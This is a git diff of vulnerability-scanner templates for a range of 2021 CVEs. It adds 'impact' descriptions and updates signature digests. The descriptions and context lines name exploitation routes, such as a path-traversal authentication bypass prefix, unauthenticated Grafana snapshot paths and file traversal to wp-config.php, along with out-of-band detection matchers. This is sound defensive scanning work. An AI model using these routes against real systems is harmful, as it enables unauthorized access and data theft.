index 554afb2f19..ef0c2c037b 100644
--- a/http/cves/2021/CVE-2021-39144.yaml
+++ b/http/cves/2021/CVE-2021-39144.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade XStream to a version that is not affected by CVE-2021-39144.
   reference:
@@ -85,4 +87,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4b0a00483046022100a57c3707eb18e853b39d5cc713eac59d8804fd0a6f88008cc466357fdd81e4f1022100c8c098be0b38ec9989d4602a86b6e2da9c457626839fdd257a9cf0b34555287d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fe8c78e88417715da3a902093997939c4e1a580b6e488f4dd607818a5a2f5c75022100a9321d094eb700c17094ebf7f8e1168e603f42835fc047fad287c4e5568b3aff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml
index 1e9c3df1a2..7507dc3359 100644
--- a/http/cves/2021/CVE-2021-39146.yaml
+++ b/http/cves/2021/CVE-2021-39146.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade XStream to a version that is not affected by CVE-2021-39146.
   reference:
@@ -117,4 +119,4 @@ http:
       - type: status
         status:
           - 500
-# digest: 4a0a00473045022100ed853807b5f2d7cf04a4f281599ff5ceb08b8641da4281285dbcd7ba45dda5df022048f3ab0fe484077491568e68d5b201d58c981b79c8fba71bc5c84e70fe93e071:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200d7bed409c0ad41c88a379e941ac6250dff741e8f4f750597ba9fa5dba89746e022100bb168a567718fb13f49e04a9cab6fc81d112e448e18477cd6d5aa3d6ca2fda87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml
index 94ebe1b2f0..bd07289774 100644
--- a/http/cves/2021/CVE-2021-39152.yaml
+++ b/http/cves/2021/CVE-2021-39152.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.
   remediation: |
     Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability.
   reference:
@@ -71,4 +73,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: Java"
-# digest: 4a0a00473045022100e0c24dfd5de98360db699d8d371fff0aaca715a75f0702a0e0279ac880b4e21d02205ee918066b0cd22c9690d158818ea956ccd47b3afaee41907318e06ac15f94a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f8e718dc238217b6e327cdae8c939b418dbd57a2b20363a5c912aebb9b4d9d19022100ea817b190b15c44f71106ac0e2ea267ca3ce43de2e7bbfbeff102b077ba9eed5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml
index ce32ecf2e3..7f8696f47e 100644
--- a/http/cves/2021/CVE-2021-39165.yaml
+++ b/http/cves/2021/CVE-2021-39165.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "pagination") && contains(body, "data")'
         condition: and
-# digest: 4a0a00473045022100d34d31af758578bac8bf8b71429329d1133737026f7a1cc9f4ad9ba04cb596c9022048348d41b418d27357651c79a692bf26d80ac2aa3e018fffb8dae8864769354b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201709c36dea4505a48eb559532cf50c20d92dab8ff58c1e8efc521ba2c32559a902205b4b3aa370c700d30d3d1b5c6348c7e542193276a600bc1221a00803cfb67520:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml
index 3648a6b5a3..29c3a30b62 100644
--- a/http/cves/2021/CVE-2021-39211.yaml
+++ b/http/cves/2021/CVE-2021-39211.yaml
@@ -5,6 +5,8 @@ info:
   author: dogasantos,noraj
   severity: medium
   description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Information disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information.
   remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022000829e2236d1d5d2fcd738e18162fb79bde360993efa45f0637b9b4051cbafa102203d9dd81ac0bddd3cdbabd7896fce1d67fea7a461381cfa158871e1614cce42e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100afebb964ad3fd00603290d0ec58fc5f1845a432db7a1d3938931a406c3e46e8002207da8996adf674e8cee6e662fad5fd2888e5d8a39a66b8f86fa59fe0990c12b29:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml
index 57bd235952..48ff542621 100644
--- a/http/cves/2021/CVE-2021-39226.yaml
+++ b/http/cves/2021/CVE-2021-39226.yaml
@@ -5,6 +5,8 @@ info:
   author: Evan Rubinstein
   severity: high
   description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to Grafana Snapshot feature.
   remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.'
   reference:
     - https://github.com/advisories/GHSA-69j6-29vr-p3j9
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220524fa7ab1aff1be436e14321c453f5d529cf3802bb980d4dcea2e8053acce66902206fab433da62d40bf3d135223fb2c49d161ce0c7aab6209c37699b8826e1ba1e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200228264e9d3063bd2dfbff8eed8da1210c9a3e495a6d362f7ba1b463fca14d630220690054c7f4296f3fe8db71b933297fcfc325e761e3ffffa9b7360e3cae0baace:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml
index 6c43ff3d87..1daf0b6c4f 100644
--- a/http/cves/2021/CVE-2021-39316.yaml
+++ b/http/cves/2021/CVE-2021-39316.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: WordPress Zoomsounds plugin 6.45 and earlier allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
+  impact: |
+    Local File Inclusion vulnerability in WordPress DZS Zoomsounds plugin allows an attacker to include arbitrary files from the server, potentially leading to remote code execution or sensitive information disclosure.
   remediation: |
     Update to the latest version of WordPress DZS Zoomsounds plugin (>=6.51) to fix the Local File Inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220141ac07b90094bd00998d843d929f0a4b8268f3148d90a97b92c07c8cf4ad56a022100d4a463539287997341bb482fd36b56b3253fa2661af06fe8b2a5bcd47a76301d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022052037d450436667a282e4c0770fcfd89fe18e9db63693ea5db11320a08f5290a022053a694f1a725ec61bfb9aa4a28744f85893cd93c43f49459d19fc0c4a1fb71b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml
index a3d181d653..14666b3d30 100644
--- a/http/cves/2021/CVE-2021-39320.yaml
+++ b/http/cves/2021/CVE-2021-39320.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP.
+  impact: |
+    The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
   remediation: |
     Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a85d2321057e39bf9cc3b5f8964ad6a492170bfc71a4e988fb48ed5c6d4ee6c8022100ce7135cc2a820cfcec57eae24df082b389940eca7f09f9cc7fa2b900985adbee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205ebc026807be07db86b150bca201deb96d081ed48cb97afe49256963ca03a887022100d5827c87667663dc52630e9f88fff139b65ae6533847b62255159592468e80c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml
index cfe49db652..4b14063014 100644
--- a/http/cves/2021/CVE-2021-39322.yaml
+++ b/http/cves/2021/CVE-2021-39322.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: medium
   description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Easy Social Icons Plugin (3.0.9) or apply the vendor-provided patch to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e37e038d05aaef634624595ca1788910873ddd1b719c40ba03cbb42c9b3dc99702202d863ea9253f9333119c2bd9aca9b809d977bc972e4c30a33aa8aa04fa941f81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f8f438d95e17071f309c360775216fe47e01795bb18be0842c497fede6e63197022069e49bce7a54880b9c4b487b6fbb0272c2878a55f4def4975197db87d4165ec7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml
index 5a27753933..82057b95cb 100644
--- a/http/cves/2021/CVE-2021-39327.yaml
+++ b/http/cves/2021/CVE-2021-39327.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1.
+  impact: |
+    An attacker can gain sensitive information from the target system.
   remediation: |
     Update to the latest version of WordPress BulletProof Security.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201a8a3d8b5cf70ca7d73581f9cb4850b8cea41d6f3b28266e0cb2678f8ed9603a022100e213cbacce4b598dd1bf3d69b0d6fabb807c29e0c498eaab034895be91d76df0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e18f1e8ea6d93628e910dc0cccd0c7813b2b7f3d29faf2715cf726df97cd317d022100abf81d6b22592818e79b0c30e8bc96704b59011f3f18ae213520da5d391d70ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml
index 30af19ea1c..83cf5da912 100644
--- a/http/cves/2021/CVE-2021-39350.yaml
+++ b/http/cves/2021/CVE-2021-39350.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: medium
   description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
+  impact: |
+    Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary JavaScript code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the FV Flowplayer Video Player WordPress plugin to mitigate this vulnerability.
   reference:
@@ -58,4 +60,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022030e7780480dc5ac49d57f690e08494a33d7d5c92b31786d78032f5b7ee2733ca022005e620df2c1d0e7dde46e7a5cb38b252b5e4c33feb73b7b0fa01482065f6e16a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a29a997ff86d723aac4432c35dc46c09f758f1a9e9dc985d099f344e651fdcb802207551b59feea2e235e0aac4b68441c1a06035058a12cdac5221cdab815d00d062:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml
index 964a854f83..774c6eb085 100644
--- a/http/cves/2021/CVE-2021-39433.yaml
+++ b/http/cves/2021/CVE-2021-39433.yaml
@@ -5,6 +5,8 @@ info:
   author: Veshraj
   severity: high
   description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e4e63462ec95cd1489f113443e62bd947d06f9e6678172fd4890224ca6bc41c002201c342cf89ab5210f565aa6755586cbd9a93d3288cc892ec3790c7417113afb16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d9060fb38394bffff18c1df439cd14af9494bfe1cd73cec5f09d14e25c8b482a022100f45ac2360e5db611b796b359f61dfca0d9554ca0ddf5cc7c3688cae2c9cf2428:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml
index ede3ebc864..9a43276813 100644
--- a/http/cves/2021/CVE-2021-39501.yaml
+++ b/http/cves/2021/CVE-2021-39501.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
+  impact: |
+    Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.
   remediation: |
     Apply the latest security patch or upgrade to a newer version of EyouCMS to mitigate the vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
-# digest: 4a0a0047304502207a4621351f85778e364a2f352bbffd2511c6b7c3cf2dc8f80dfc3ce32fb03628022100c5e7bb52e263e0ec5cf93fab3be328b36755930a5ccaf3b02f07a8de0e32f6c0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205492dbad984d84edf446668885cbf69341e7d2be3dc222c2f653edd97ee92c2102204ffa17935d915711d169efefe82ad23dbb2a0c53f25de40e76a7611e0b39f379:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml
index 4a8d1de730..89d5cc3a6b 100644
--- a/http/cves/2021/CVE-2021-40149.yaml
+++ b/http/cves/2021/CVE-2021-40149.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
+  impact: |
+    An attacker can obtain the private key, potentially leading to unauthorized access and compromise of the camera.
   remediation: |
     Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ab5b5786416a31d649807ea75a00721a609b25d839bee3be450e087a7e8627b3022100bfafeb0372957dddb2e22adb40687da3e9aeb0a9f3ab2384690e333ecdab145b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b12fcca1e37253e0a67553fbe76baca5b55d6ebc389abe01d03fe8173f45b341022100cf9d1451aacbe8f807112c7cd45ba6da02f04cb69943206cf10ede1a755835a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml
index 4799503abe..e16e915158 100644
--- a/http/cves/2021/CVE-2021-40150.yaml
+++ b/http/cves/2021/CVE-2021-40150.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security.
   remediation: |
     Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150).
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100fe1b6a7459d3188e4e580a25fddd2ff2be7e560ba05381176173595d6ec8bb85022040de4b476ba49bcbb0e353d4cd27438c33921ada32f2cf9abad9a24e9dd751b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a904b1b9bdce1a3e08ddaa99b87f1451723ba0f97d5970fe87129946c54cb9e022100b2611d3d2261b014c42d43dc2c4447f8670fcb12d44c093c172080904c5c362c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40323.yaml b/http/cves/2021/CVE-2021-40323.yaml
index 7b467ab9da..5ac4b6829a 100644
--- a/http/cves/2021/CVE-2021-40323.yaml
+++ b/http/cves/2021/CVE-2021-40323.yaml
@@ -5,6 +5,8 @@ info:
   author: c-sh0
   severity: critical
   description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system.
   remediation: |
     Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability.
   reference:
@@ -104,4 +106,4 @@ http:
         regex:
           - '<value><string>(.*?)</string></value>'
         internal: true
-# digest: 4a0a00473045022006339cdf60302bcd38d82f79cf587d3c9a13e56d4ecf0ecf9b77cb0abb18f871022100dee9f07d06fcc82eadf36e4e1a20eff306d3410b205499ffd4bb265832b2d1e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c086139ee711434a0623741071fdb455e6f4c791eb82e5dd0433f8fa54e612c80221009faf49ae2bc0d87ee6fc943343c7b840a6cae8f317184a43167090c9107eefc6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml
index e2b0eaecbb..83019b39ac 100644
--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@@ -46,4 +46,4 @@ http:
       - type: word
         part: body_2
         words:
-          - "<h1> Interactsh Server </h1>"
+          - "<h1> Interactsh Server </h1>"
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml
index 92e9d1614c..6b479e15fa 100644
--- a/http/cves/2021/CVE-2021-40539.yaml
+++ b/http/cves/2021/CVE-2021-40539.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo,pdteam
   severity: critical
   description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.
+  impact: |
+    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.
   remediation: Upgrade to ADSelfService Plus build 6114.
   reference:
     - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis
@@ -115,4 +117,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fe5a567e0fa3fda20bf5c5a0908d1a22a2839ef6859b993959b4a9b20b23e4110221008019967361a6a889f6d7ddcd87465a63979009d4b5a08f79e4d35ede08839cae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220477edc199d91c95264b81ef90ad029a70e73366f298af303ecd58735b1b4bfba022054987f7d01790ad977f7e1fc999e68fa28ca9d71d0eb5f1c03d5e67a407d61ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml
index bbc6c665b8..f8d32dfff9 100644
--- a/http/cves/2021/CVE-2021-40542.yaml
+++ b/http/cves/2021/CVE-2021-40542.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Opensis-Classic Version 8.0 is affected by cross-site scripting. An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f84fc0d3c0b5553772f93728bbbf6621c334829ef54345d332576e6d7028fa6b022100c43108ac93dc4548ae6e025c41d5f28d15919cdaf5d7032151e266773808319f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207f94454c13d40fd2daf03d04ed357e5fe36ad7c2f12e392ca76f20247269ab3b022055ed9888a9e135654ed00c2cab2707504b0ab1b4cab4dda639cc6b8e5fc060b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml
index a6707ead60..bed9a85261 100644
--- a/http/cves/2021/CVE-2021-40661.yaml
+++ b/http/cves/2021/CVE-2021-40661.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10') is vulnerable to unauthenticated local file inclusion. It is possible to traverse the folders of the affected host by providing a relative path to the 'webpage' parameter in AutoCE.ini. This could allow a remote attacker to access additional files on the affected system.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the system.
   remediation: |
     Apply the latest firmware update provided by the vendor to mitigate the vulnerability and ensure that the device is not accessible from untrusted networks.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201ffee6f18357c1d0e1ae5938e1be6843e8c270e1f4854d94d763f95ff2e1a3c0022100c0175951b0deb298d0a496f63711d2cb88493f02aff6e32772cdf9f13f3b7aa2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220259860814a12426c3b86bc6753ca32fdaf03ba9c7323b123f5c7b0248345e91d022050abd2b2b3895d28d84d59c645f17c544d289315b7de9cc7d6c17f6b5c6584d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml
index e315007c40..f01659ce61 100644
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -5,6 +5,8 @@ info:
   author: For3stCo1d,aringo-bf
   severity: high
   description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.
   remediation: |
     Apply the latest security patches or updates provided by the Geoserver project to mitigate the SSRF vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f6f69fb61cadac2c78425a695a9fc9df3939579e20e11e1ae3089f234ef38adc022100b73b3aca9e29d680a69f228d84eea34c4c4c85d51804fb9e4bd27ebe3b7ea86a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f7b75ddc2415875cc4ca8784e14e47f33823d55d67421f78d11090004e9b0be1022037d87e6842a2dbbfd6157ef9456aae6e56769a28a2910e41549a8331cd327f35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml
index a5cdc563c3..4dc2bdf7ce 100644
--- a/http/cves/2021/CVE-2021-40856.yaml
+++ b/http/cves/2021/CVE-2021-40856.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: high
   description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the device.
   remediation: |
     Apply the latest firmware update provided by Auerswald to fix the authentication bypass vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220587c898521db488860512cbbd29f3c1607db0833fb585a3eb2c4281cabfe9b0a022010cf84432efcb531ad56149b369212755e48f1f497dd742418f6f0ce94d57e2d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220681c84e6b2bd92db4f3193ada78e267cb226f143689d57533fcc7de7ee96192f02202cad56c78fc847bef9fb9d672fc72299440d7e3613ca19b9654ae2c9a7f401e5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml
index 31de44f88d..5125fc2cf8 100644
--- a/http/cves/2021/CVE-2021-40859.yaml
+++ b/http/cves/2021/CVE-2021-40859.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: critical
   description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.
+  impact: |
+    Unauthenticated attackers can gain unauthorized access to affected devices.
   remediation: |
     Apply the latest firmware update provided by Auerswald to fix the backdoor vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d88e8725b3042530af2f52fd581b5e625c72c1c58edb280750ee6ca76eea5f07022100f466e3568ad7bbbcd31f34b151626f49eec246c0e16c208eb8b577957ab9afb3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
